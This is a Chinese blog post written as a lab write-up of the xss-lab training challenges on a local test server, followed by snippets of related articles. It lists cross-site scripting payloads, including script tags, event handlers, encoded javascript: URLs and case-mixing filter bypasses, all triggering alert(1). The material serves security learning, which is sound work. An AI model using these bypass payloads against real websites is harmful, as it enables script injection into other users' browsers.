XSS漏洞攻击报告

最新推荐文章于 2024-09-06 17:32:37 发布
最新推荐文章于 2024-09-06 17:32:37 发布
阅读量862 收藏 7
点赞数 2
分类专栏: xss 文章标签: xss 前端
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/vsdfbhsdhsdfh/article/details/126842251
版权

XSS漏洞攻击报告

Cross-Site Scripting 简称为“CSS”,为避免与前端叠成样式表的缩写"CSS"冲突,故又称XSS。一般XSS可以分为如下几种常见类型:
    1.反射性XSS;
    2.存储型XSS;
    3.DOMXSS;


XSS漏洞一直被评估为web漏洞中危害较大的漏洞,在OWASP TOP10的排名中一直属于前三的江湖地位。
XSS是一种发生在前端浏览器端的漏洞,所以其危害的对象也是前端用户。
形成XSS漏洞的主要原因是程序对输入和输出没有做合适的处理,导致精心构造的字符输出在前端时被浏览器当作有效代码解析执行从而产生危害。
因此在XSS漏洞的防范上,一般会采用对输入进行过滤输出进行转义的方式进行处理:
  输入过滤:对输入进行过滤,不允许可能导致XSS攻击的字符输入;

  输出转义:根据输出点的位置对输出到前端的内容进行适当转义;

环境

服务器win7:192.168.188.132

攻击机win10:192.168.188.1

这次我们使用xss-lab

第一关

Payload: http://192.168.188.132/xss/level1.php?name=<script>alert(1)</script>

第二关

这次就不行了

我们判断前有”的标记前面加上”>就可以执行了

Payload: http://192.168.188.132/xss/level1.php?name=”><script>alert(1)</script>

第三关

用第二关的payload去试一下

不行

没有当成js来执行

可以使用事件来执行

Payload=‘onmousemove=’javascript:alert(1)’

第四关

在第三关的基础上变成””就行了

Payload = "onclick ='javascript:alert(1)

第五关

发现过滤了

我们可以构造一个新的标签

Pyload="></input><a href='javascript:alert(1)'>asd</a>

第六关

Pyload="></input><a href='javascript:alert(1)'>asd</a>

第七关

发现了过滤

Payload =1"><ScscriptRipt>alert(1)</ScscriptRipt>

第八关

发现了过滤

使用union编码进行一个转义

Payload=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#49;&#41

第九关

Payload=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#49;&#41;//http://www.baidu.com

显示连接不合法,应该是对url进行判断

第十关

发现了三个input

Payload= &t_sort=" type='text' οnclick='javascript:alert(1)'>//

第11关

这一关要用bp

Payload=

第12关

抓包发现是这个

把user-agent修改

第13关

这次就应该是改cookie

结果

第十四关

有问题

第十五关

是包含外部文件的我们可以使用第一关的代码

第十六关

过滤先是把它小写

Payload =<svg%0Aοnlοad=alert(1)>

XSS跨站脚本攻击以及SQL注入攻击实验报告
AC1145的博客
11-28 2234
XSS跨站脚本攻击以及SQL注入攻击实验报告 XSS跨站脚本攻击 学号/工号查询 输入正确的信息后,我们会得到正确的输出结果。如果输入的名字在数据库中不存在,则无法查询到结果。 XSS跨站脚本攻击 根据判断,我们可以用一段JavaScript语言写的代码“”或者“SQL注入攻击 学号查询功能的SQL注入攻击 我们先查看一下query.php程序代码 发现其19行,33行,47行查询语句是一样的...
【实验报告】实验三 XSS和SQL注入
m0_52108440的博客
12-13 1902
实验目的:了解什么是XSS;了解XSS攻击实施,理解防御XSS攻击的方法;了解SQL注入的基本原理;掌握PHP脚本访问MySQL数据库的基本方法;掌握程序设计中避免出现SQL注入漏洞的基本方法;掌握网站配置。 系统环境:Kali Linux 2、Windows Server 网络环境:交换网络结构 实验工具: Beef;AWVS(Acunetix Web Vulnarability Scanner);SqlMAP;DVWA 实验步骤: XSS部分:利用Beef劫持被攻击者客户端浏览器。 实验环境搭建。.
XSS漏洞报告
dongbule的专栏
04-22 541
对于的用户输入搜索出现XSS漏洞的问题,主要是由于开发人员对XSS了解不足,安全的意识不够造成的。现在让我们来普及一下XSS的一些常识,以后在开发的时候,每当有用户输入的内容时,都要加倍小心。 一、什么是XSS XSS又叫CSS (Cross Site Script) ,跨站脚本攻击。它指的是恶意攻击者往Web页面里插入恶意html代码,当用户浏览该页之时,嵌入其中Web里面的htm...
xss简单渗透测试
weixin_30244889的博客
02-14 225
xss简单渗透测试 xss简单渗透测试 Write by admin in未分类at 2009-07-27 11:13:24 xss简单渗透测试 Author: jianxin [80sec]EMail: jianxin#80sec.comSite: http://www.80sec.comDate: 2008-12-24From:http://w...
XSS漏洞攻击与防护源代码
10-31
XSS(Cross-site scripting)是一..."shiyaner"这个文件可能是包含了一些实验或示例代码,用于演示XSS漏洞攻击方式以及如何防护。通过学习这些源代码,开发者可以更好地理解和实践XSS防护策略,提高Web应用的安全性。
奇安信安全扫描漏洞解决路径遍历和存储型xss和反射xss攻击漏洞
11-09
亲测可用,中级漏洞,解决服务器段请求伪造 final String forURL = ESAPI.encoder().encodeForURL(url); restTemplate.exchange(forURL, HttpMethod.GET,new HttpEntity<String>(headers), List.class, params);
DedeCMS 存储型xss漏洞1
08-03
这个存储型 XSS 漏洞允许攻击者通过注入恶意脚本到 `des` 参数,从而在用户的浏览器上执行,获取用户的敏感信息,如 Cookie。该漏洞在DedeCMS V5.7 UTF8 SP2 版本中被发现,发布日期为2017年3月15日。当DedeCMS的...
XSS漏洞攻击
qq_57307348的博客
02-17 4390
1、在掌握xss之前,首先要了解什么是html、css、JavaScript。 1)Html:超文本标记语言,是一种用于创建网页的标准标记语言。HTML是一种基础技术,常与CSS、JavaScript一起被众多网站用于设计网页、网页应用程序以及移动应用程序的用户界面。 2)Css:是一种用来为结构化文档(如HTML文档或XML应用)添加样式(字体、间距和颜色等)的计算机语言。 3)JavaScript:相当于更好的实现和用户的交 互,是信息传递实现双向化。 2、同源策略 同源策略是一个重要的安..
XSS漏洞
2401_83181186的博客
04-25 1161
XSS漏洞介绍以及beef,waf简介
xss漏洞简要分析
VN520的博客
02-27 260
由应用程序发布的一段脚本可以从URL中提取数据,对这些数据进行处理,然后用它动态更新页面的内容。产生背景:如果一名用户提交的数据被保存在应用程序中(通常保存在一个后端数据库中),然后不经适当过滤或净化就显示给其他用户,此时就会出现这种漏洞。利用这种漏洞需要设计一个包含嵌入式JavaScript代码的请求,随后这些代码又被反射到任何提出请求的用户,因而它被称作反射型XSS。3. 漏洞的严重程度取决于它出现的情境以及利用它的攻击者希望达到何种目标。b.服务器的响应中并不以任何形式包含攻击者的脚本。
网络安全———XSS漏洞综述
VN520的博客
02-27 920
XSS(也称为跨站脚本攻击)是一个web安全漏洞,它允许攻击者破坏用户与易受攻击的应用程序的交互。它允许攻击者绕过隔离不同网站的同源策略。跨站点脚本漏洞通常允许攻击者伪装成受害用户,执行用户能够执行的任何操作,并访问用户的任何数据。如果受害用户在应用程序中拥有最高权限,那么攻击者就可能获得对所有应用程序功能和数据的完全控制。
XSS漏洞个人总结
weixin_46739058的博客
04-26 2916
初级xss攻击思路,绕过
教怎样写好一份“漏洞报告
HBohan的博客
11-15 2022
写好报告 漏洞赏金猎人的工作不仅仅是寻找漏洞;它还向组织的安全团队解释它们。如果您提供一份写得很好的报告,您将帮助与您合作的团队重现漏洞利用,将其分配给适当的内部工程团队,并更快地解决问题。 商业化的报告模板是一个不错的形式,但比它更出色的是,观察与思考。 从工作流程的角度来说,漏洞管理与账面核对也非常重要。一个组织如果长时间接收到报告,那么面临到的问题一定是一些个性化的。比如,漏洞管理过程中,命名的规范直接导致这个能否一眼看出是否重复提交,是否易于管理与记账,是否存在数据之间的关联与匹配性。 文档名称规范
存储型XSS漏洞
weixin_41970600的博客
03-12 664
除了直接弹窗探测,复杂点可以闭合input,textarea等标签绕过上传; 一般服务端对客户端表单长度限制 如果仅仅限制长度可以采用分段上传: (上面是原始数据,下面是经过截断上传) 一般后台防范方法都是将传递数据过滤,比如: data[′title′]=striptags(data['title'] = strip_tags(data[′title′]=stript​ags(data[‘...
XSS漏洞-01】XSS漏洞简介、危害与分类及验证
VN520的博客
09-06 3127
定义/原理:跨站脚本(Cross-Site Scripting),本应该缩写为CSS,但是该缩写已被层叠样式脚本Cascading Style Sheets所用,所以改简称为XSS。也称跨站脚本或跨站脚本攻击。跨站脚本攻击XSS通过将恶意得Script代码注入到Web页面中,当用户浏览该页之时,嵌入其中Web里面的Script代码会被执行,从而达到恶意攻击用户的目的。本质:是一种针对网站应用程序的安全漏洞攻击技术,是代码注入的一种。特点:XSS主要基于JavaScript。
网络攻防-XSS攻击实验
qq_64389397的博客
01-07 2452
1.在传播病毒的同时,将病毒也复制在about me中,这样这段代码就会一直存在,所有访问都在自己的about字段添加这段代码,这样就能一直传第下去。如果不添加If判断,如果时samy自己进入个人简介,也会触发JavaScript代码,但是因为post的about me字段为空,那么这段JavaScript代码将会被清空,所以需要加上这段if判断,这样当当前用户是samy时,不会触发。3.由获取的信息可知,接口的url地址,post提交数据的方式,使用这些信息填入JavaScript框架的对应信息中。
跨站脚本攻击XSS (cross site scripting)--一个小实验
aarong的博客
11-23 2725
进行一个xss跨站脚本攻击,获取目标的IP和Cookie信息。
存储型xss漏洞
安全界的彭于晏的博客
06-29 1192
存储型XSS漏洞反射形成的原因一样,不同的是存储型XSS攻击者可以将脚本 注入到后台存储起来,构成更加持久的危害,因此存储型XSS也称’'永久型’XSS.
xss双模防御实验
最新发布
03-08
### 实现和测试XSS双重防御方法 #### 1. 输入验证与编码 输入验证是指在接收任何来自客户端的数据之前,服务器端应该严格检查并过滤掉非法字符或模式。对于HTML特殊字符应进行转义处理,防止这些字符被解释成活动内容。 ```python import html def sanitize_input(user_input): safe_output = html.escape(user_input) # 对用户输入进行HTML实体编码 return safe_output ``` 此段代码展示了如何对用户提交的内容进行基本的安全转换[^1]。 #### 2. HTTP头部设置 除了上述服务端逻辑上的防范之外,还可以通过配置HTTP响应头来增强安全性。具体来说,可以通过`Content-Security-Policy (CSP)`指令限制页面加载资源的位置以及哪些脚本能被执行。 ```http Content-Security-Policy: default-src 'self'; script-src 'self' https://apis.google.com; ``` 这条CSP规则只允许从当前域名加载资源,并且仅限于本站点本身或是指定第三方API站点提供的JavaScript文件得以执行[^3]。 #### 3. 测试环境搭建 为了有效评估所采取措施的有效性,建议在一个受控环境中模拟真实的Web应用程序场景来进行测试。可以选择开源项目如DVWA(Damn Vulnerable Web Application),它包含了多种已知漏洞供学习者练习修补技巧[^2]。 #### 4. 使用自动化工具辅助检测 借助专门设计用来发现跨站脚本缺陷的静态分析器或者动态扫描程序能够帮助识别可能存在的安全隐患。Burp Suite Pro就是一个非常流行的选择,它可以拦截HTTP流量并对请求参数实施模糊测试以查找潜在问题所在。 #### 5. 结合实际案例深入理解 最后但同样重要的是,参考真实世界发生的事件可以帮助加深对这类威胁的认识水平。查阅公开报道过的安全事件记录,尤其是那些涉及知名网站遭受攻击的事例,往往能提供宝贵的经验教训。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值